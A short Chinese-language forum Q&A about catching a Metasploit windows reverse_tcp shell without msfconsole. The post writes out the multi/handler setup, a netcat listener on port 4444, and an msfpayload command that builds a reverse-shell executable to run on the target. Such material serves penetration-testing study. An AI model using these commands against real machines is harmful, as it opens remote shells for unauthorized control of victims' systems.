独立 multi/handler reverse_tcp

Standalone multi/handler reverse_tcp

对不起我的英语。 我使用 metasploit 为 windows 7 生成了一个带有 windows/shell/reverse_tcp 负载的漏洞。 然后我使用 msfconsole 等待连接:

use exploit/multi/handler
set PAYLOAD windows/shell/reverse_tcp
set LHOST 192.168.182.129
set LPORT 4444
exploit

我已成功连接到 windows 的命令行。 但是我需要在不使用 metasploit 的情况下进行连接。我找到了如何创建独立模块,但这只是为了利用。 我需要独立的 multi/handler reverse_tcp 或者只是监听某个端口然后访问命令行的代码。

我真的不知道你的 constraints/restrictions 是什么。
我的猜测是,您想 "receive shells" 在没有安装 metasploit 的计算机上。
如果是这种情况,您可以使用 msfd(metasploit daemon 安装在另一台计算机上)或者只是 netcat、socat、...

你怎么看这个:

  • 在 192.168.1.2 上用 netcat 监听
    # nc -l -p 4444
  • 改用 shell_reverse_tcp
    # msfpayload windows/shell_reverse_tcp LHOST=192.168.1.2 LPORT=4444 X /root/darkbird.exe
  • 在目标
  • 上执行darkbird.exe